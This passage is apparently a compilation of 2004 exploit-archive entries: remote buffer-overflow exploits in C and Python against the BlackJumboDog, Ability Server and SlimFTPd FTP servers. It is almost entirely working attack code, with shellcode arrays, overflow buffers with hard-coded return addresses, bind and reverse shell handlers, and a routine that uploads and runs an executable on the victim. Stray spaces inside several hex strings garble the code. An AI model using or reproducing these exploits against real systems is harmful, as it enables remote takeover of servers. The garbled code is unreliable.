"\xDF\x77\xDE\xA0\x63\x5D\xDB\x77\xDE\x90\xDF\x77\x DE\xA4\xE0\x8D\x88\x88\x88\x77"
"\xFE\xBC\x77\xDE\xA8\xB9\x77\xDF\x77\xDE\x94\xDD\x DE\xEC\x29\xB8\x88\x88\x88\x03"
"\xC8\x84\x03\xF8\x94\x25\x03\xE0\x80\x01\x60\xD6\x D5\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x89\x 62\x03\xC2\x90\x03\xD2\xA8\x89"
"\x63\x6B\xBD\xC1\x03\xBC\x03\x89\x66\xB9\x77\x74\x B9\x48\x24\xB0\x68\xFC\x8F\x49"
"\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x 03\xD2\xAC\x89\x63\xEE\x03\x84"
"\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89\x60\x61\x 8A\x88\x88\x88\xB9\x48\x01\x62"
"\xD7\xD6\xD5\xD3\x4A\x8C\x88\x60\x1B\x76\x77\x77\x 51\x81\x7D\x25\x43\x65\x74\xB3"
"\x2C\x92\xF8\x4F\x2C\x25\xA6\x61\x6D\xC1\x0E\xC1\x 3E\x91\x90\x6F\x6F\xF1\x4E\xF1"
"\x67\x46\x68\xE8\x10\x76\x02\x86\x2D\x9F\x88\xF4\x 97\xF1\x82\x60\x73\x1F\x75\x87"
"\xDF\xDB\xBA\xD7\xBB\xBA\xA6\xCC\xC4\xC4\x88\xDA\x B8\xB8\xFC\xA6\xED\xF0\xED\x88";
int fileupload(int port,char *FileName,char* ip){
FILE* file;
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL;
int read=0;
printf("[+] Opening File\n");
file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failed\n");
return 0;
}
printf("[+] File found ready to send\n");
if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return 0;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -
1) {
printf("[-] Connecting error\n");
return 0;
}
printf("[+] Connected\n[+] Sending executable.\n");
while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return 0;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 1;
}
void banner(){
printf("BlackJumboDog FTP Server Buffer Overflow version 3.6.1\nhttp://www.securiteam.com/windowsntfocus/5AP040ADPW.html\nThx
to Chew Keong TAN\n");
printf("\nDelikon|6.9.04|www.Delikon.de\n");
}
void usage(){
printf("\nBJDExploit HOST PORT FileToUpload\n");
}
//#pragma lib <ws2_32.lib>
#pragma comment(lib,"ws2_32.lib")
int main(int argc,char *argv[]) {
int sockfd, numbytes;
//i have some problems with the ret-addresses
//only this one worked
//the SEH don't executes every address
// but i don't know the reason
DWORD RetAddr=0x6BD01395;
/* SYNCOR11.DLL XP sp2 full patched english version
6BD01395 5E POP ESI
6BD01396 33C0 XOR EAX,EAX
6BD01398 5D POP EBP
6BD01399 C2 0800 RETN 8
*/
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
int read=0;
WSADATA wsaData;
if(argc<3){
banner();
usage();
exit(1);
}
banner();
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{
printf("[-] Connecting error\n");
return -1;
}
printf("\n[+] Connected.\n");
read=sizeof(buf);
numbytes=recv(sockfd,buf,read,0);
buf[numbytes]=0x00;
printf("%s \n",buf);
memset(buf,0x00,sizeof(buf));
Sleep(200);
strcpy(buf,"USER ");
memset(buf+strlen(buf),0x41,308);
memcpy(buf+strlen(buf),"\xeb\x06",2);
memset(buf+strlen(buf),0x41,2);
memcpy(buf+strlen(buf),&RetAddr,4);
strcat(buf,shellcode);
buf[strlen(buf)]='\x0a';
printf("[+]Shellcode length: %i \n",strlen(shellcode));
read =strlen(buf);
numbytes=send(sockfd,buf,read,0);
printf("[+] Sending the shellcode\n");
Sleep(2000);
printf("[+] Sleeping\n");
if(fileupload(7777,argv[3],argv[1]))
printf("[+] Have a nice day\n");
closesocket(sockfd);
WSACleanup();
return 0;
}
// [2004-09-12]
21 Ability Server <= 2.34 (STOR) Remote Buffer Overflow Exploit
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "###################################"
# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
# Change RET address if need be.
#buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2
try:
# Edit the IP, Username and Password.
ftp = FTP('127.0.0.1')
ftp.login('ftp','ftp')
print "\nEvil Buffer sent..."
print "\nSploit will hang now because I couldn\'t figure how to use storelines()."
print "\nTry connecting with netcat to port 4444 on the remote machine."
except:
print "\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer)
except:
print "\nDone."
# [2004-10-21]
21 Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit
##################################################
## ##
## Ability Ftp Server 2.34 ##
## Remote exploit in APPE command ##
## discovered,exploited by KaGra ##
## Use it with netcat: exploit.py|nc (host) 21 ##
## BindShell at port 4444,one shot OnLy! ##
##################################################
import struct
shell = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
shell += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
shell += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
shell += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
shell += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
shell += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
shell += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
shell += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
shell += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
shell += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
shell += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
shell += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
shell += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
shell += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
shell += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
shell += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
shell += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
shell += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
shell += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
shell += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
shell += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
shell += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
shell += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
shell += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
shell += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
buffer = '\x41'*968+struct.pack('<L', 0x77da76af)+'\x42'*32+shell # JMP ESP=>0x77da76af Windows XP SP1 EngLisH
print "USER kagra"# Enter a valid username HeRe!
print "PASS kagra"# Enter a valid password HeRe!
print "APPE " + buffer
# [2004-10-23]
21 Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define RET "\xC7\xF2\xC8\x77" /*win2k adv server sp4*/
#define PORT 21
#define PORT1 31337
#define BACKLOG 1
/* www.metasploit.com*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5a\x81\x 73\x17\x92\x8e"
"\xe9\x41\x83\xeb\xfc\xe2\xf4\x6e\x66\xbf\x41\x92\x 8e\xba\x14\xc4"
"\xd9\x62\x2d\xb6\x96\x62\x04\xae\x05\xbd\x44\xea\x 8f\x03\xca\xd8"
"\x96\x62\x1b\xb2\x8f\x02\xa2\xa0\xc7\x62\x75\x19\x 8f\x07\x70\x6d"
"\x72\xd8\x81\x3e\xb6\x09\x35\x95\x4f\x26\x4c\x93\x 49\x02\xb3\xa9"
"\xf2\xcd\x55\xe7\x6f\x62\x1b\xb6\x8f\x02\x27\x19\x 82\xa2\xca\xc8"
"\x92\xe8\xaa\x19\x8a\x62\x40\x7a\x65\xeb\x70\x52\x d1\xb7\x1c\xc9"
"\x4c\xe1\x41\xcc\xe4\xd9\x18\xf6\x05\xf0\xca\xc9\x 82\x62\x1a\x8e"
"\x05\xf2\xca\xc9\x86\xba\x29\x1c\xc0\xe7\xad\x6d\x 58\x60\x86\x13"
"\x62\xe9\x40\x92\x8e\xbe\x17\xc1\x07\x0c\xa9\x8d\x 8e\xe9\x41\x02"
"\x8f\xe9\x41\x24\x97\xf1\xa6\x36\x97\x99\xa8\x7e\x 77\x43\x21\x4b"
"\x87\x1c\xec\x59\x63\x15\x7a\xc5\xdd\xdb\x1e\xa1\x bc\xe9\x1a\x1f"
"\xc5\xf1\x10\x6d\x59\x60\x9e\x1b\x4d\x64\x34\x86\x e4\xec\x18\xc3"
"\xdd\x16\x75\x1d\x71\xbc\x45\xcb\x07\xed\xcf\x70\x 7c\xc2\x66\xc6"
"\x71\xde\xbe\xc7\xa6\xd8\x81\xc2\xde\xb9\x11\xd2\x de\xa9\x11\x6d"
"\xdb\xcd\xc8\x55\xe6\x29\xe9\x92\x8c\x81\x43\x92\x f4\x80\xc8\x73"
"\xe4\xf9\x10\xc5\x71\xbc\x61\xcb\xd7\x81\x02\xdf\x ca\xe9\xc8\x71"
"\x09\x13\x70\x52\x03\x95\x65\x3e\xe4\xfc\x18\x61\x 25\x6e\xbb\x11"
"\x62\xbd\x87\xd6\xaa\xf9\x05\xf4\x49\xad\x65\xae\x 8f\xe8\xc8\xee"
"\xaa\xa1\xc8\xee\xaa\xa5\xc8\xee\xaa\xb9\xcc\xd6\x aa\xf9\x15\xc2"
"\xdf\xb8\x10\xd3\xdf\xa0\x10\xc3\xdd\xb8\xbe\xe7\x 8e\x81\x33\x6c"
"\x3d\xff\xbe\xc7\x8a\x16\x91\x1b\x68\x16\x34\x92\x e6\x44\x98\x97"
"\x40\x16\x14\x96\x07\x2a\x2b\x6d\x71\xdf\xbe\x41\x 71\x9c\x41\xfa"
"\x7e\x63\x45\xcd\x71\xbc\x45\xa3\x55\xba\xbe\x42\x 8e\xe9\x41";
struct sockaddr_in hrm,lar,target;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}
printf("[x] Connected to: %s.\n",ip);
return sockfd;
}
int listener()
{
int sd;
lar.sin_family = AF_INET;
lar.sin_port = htons(PORT1);
lar.sin_addr.s_addr = INADDR_ANY;
bzero(&(lar.sin_zero),8);
sd = socket(AF_INET,SOCK_STREAM,0);
if((bind(sd,(struct sockaddr *)&lar,sizeof(struct sockaddr)))<0)
{
perror("bind");
exit(0);
}
printf("[x] Bind successfull.\n");
if((listen(sd,BACKLOG)) < 0)
{
perror("listen");
exit(0);
}
printf("[x] Listening on port %d.\n",PORT1);
return sd;
}
int main(int argc, char *argv[])
{
char *buffer=malloc(1387),*A=malloc(968),*B=malloc(32), *reply=malloc(200);
int x,l,news,f;
memset(A,0x41,968);
strcat(buffer,A);
memset(B,0x42,32);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
printf("**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**\n");
printf("[x] Launching listener.\n");
l = listener();
x = conn("192.168.0.1");
sleep(5);
printf("[x] Sending bad code...");
write(x,"USER lar\r\nPASS lar\r\n",20);
sleep(3);
write(x,"STOR ",5);
write(x,buffer,strlen(buffer));
write(x,"\r\n\r\n",4);
sleep(3);
printf("done.\n");
printf("[x] Waiting for shell.\n");
close(x);
while(1)
{
news = sizeof(struct sockaddr_in);
if((f=accept(l,(struct sockaddr *)&target,&news)) < 0)
{
perror("accept");
continue;
}
printf("[x] Got connection from %s.\n",inet_ntoa(target.sin_addr));
if(!fork()){
printf("[x] 0wn3d!\n\n");
shell(f);
close(f);
exit(0);
}
close(f);
}
}
// [2004-11-07]
21 SlimFTPd <= 3.15 Remote Buffer Overflow Exploit
/*
SlimFTPd <= 3.15, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
10 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS SLIMFTPD
------------------
Homepage - http://www.whitsoftdev.com/slimftpd/
SlimFTPd is a fully standards-compliant FTP server implementation with an advanced
virtual file system.It is extremely small, but don't let its file size deceive you:
SlimFTPd packs a lot of bang for the kilobyte. It is written in pure Win32 C++ with
no external dependencies and no messy installer. SlimFTPd is a fully multi-threaded
application that runs as a system service on Windows 98/ME or Windows NT/2K/XP, and
it comes with a tool to simplify its installation or uninstallation as a system service.
Once the service is started, SlimFTPd runs quietly in the background.
It reads its configuration from a config file in the same folder as the executable,
and it outputs all activity to a log file in the same place.
The virtual file system allows you to mount any local drive or path to any virtual
path on the server. This allows you to have multiple local drives represented on the
server's virtual file system or just different folders from the same drive.
SlimFTPd allows you to set individual permissions for server paths.
Open slimftpd.conf in your favorite text editor to set up SlimFTPd's configuration.
The format of SlimFTPd's config file is similar to Apache Web Server's for those
familiar with Apache.
--------------
VULNERABILITY
--------------
A simple buffer overflow when a large buffer is passed to different commands,
CWD, STOR, MKD, STAT etc.., nothing more, the attacker need to be logged in,
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted, is warning users, and working on a fix.
----
EXTRA
----
Ok I'll try to explain what happen in this one with my crap english...
As you can notice , I havent used as usual a CALL/JMP offset address from a DLL.
Why ? Because if you debug, you will notice that we are able to overwrite
only 3/4 bytes of EIP maximum due to a buffer length restriction in the ftp server (~500bytes).
The 4th byte will always point to 00. But this 00 is enough helpful to fake there my
magic ret ;p
Ok once you understand what is this magic ret , I think that you understanded all there...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
F.U.C.K
K-OTik.com displaying the half part of codes they receive
(also some other friends to me noticed it..., another ie:
JPEG Exploits, 6 or 7 mirrors displayed, poor assh0les...)
*/
#include "winsock2.h"
#include "fstream.h"
char scode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
char cmd[]="CWD ";
char call[]="\xb2\x06\x40"; // Magicret ;p
#pragma comment(lib, "ws2_32")
void usage(char* us);
WSADATA wsadata;
void ver();
static char payload[5000];
int main(int argc,char *argv[])
{
ver();
if ((argc<5)||(argc>6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
char *login=argv[2], *passwd=argv[3], data[10], recvbuf2[100], recvbuf[100], rootbuf[100], logbuf[100], logbuf2[100], pdbuf[100], pdbuf2[100];
int ip=htonl(inet_addr(argv[4])), sz, a, sizeA, lgth, port;
if (argc==6){port=atoi(argv[5]);}
else port=21;
char *os;
if (atoi(argv[1]) == 1){os="Win2k based system";}
if (atoi(argv[1]) == 1){os="Win2k based system";}
if (atoi(argv[1]) == 2){os="WinXP based system";}
if (atoi(argv[1]) == 2){os="WinXP based system";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, login in process..."<<endl;
Sleep(100);recv(s,recvbuf2,100,0);
if (!strstr(recvbuf2,"220")){cout<<"[+] this is not an ftp server, quitting..."<<endl;return -1;}
strcpy(logbuf,"USER ");strcpy(logbuf2,login);strcpy(pdbuf,"PASS ");strcpy(pdbuf2,passwd);strcpy(rootbuf,"STOU AUX");strcpy(data,"\r\n");
if (send(s,logbuf,strlen(logbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,logbuf2,strlen(logbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
Sleep(1000);
if (send(s,pdbuf,strlen(pdbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,pdbuf2,strlen(pdbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
Sleep(1000);
if (recv(s,recvbuf,200,0)==SOCKET_ERROR){ cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (strstr(recvbuf,"530")){ cout<<"[+] wrong login or passwd"<<endl;return -1;}
cout<<"[+] login success!"<<endl;Sleep(1000);cout<<"[+] sending the exploit string"<<endl;
if (atoi(argv[1]) == 1){lgth=500+1;}
if (atoi(argv[1]) == 2){lgth=498+1;}
sizeA=lgth-sizeof(scode);
sz=(sizeA-1)+sizeof(scode)+10;
memset(payload,0,sizeof(payload));
strcat(payload,cmd);strcat(payload,"\x41\x41\x41");
strcat(payload,scode);
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,call);
strcat(payload,"\r\n");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_slim.exe Target Login Pass Ip Port\n"<<endl;
cout<<"TARGETS: "<<endl;
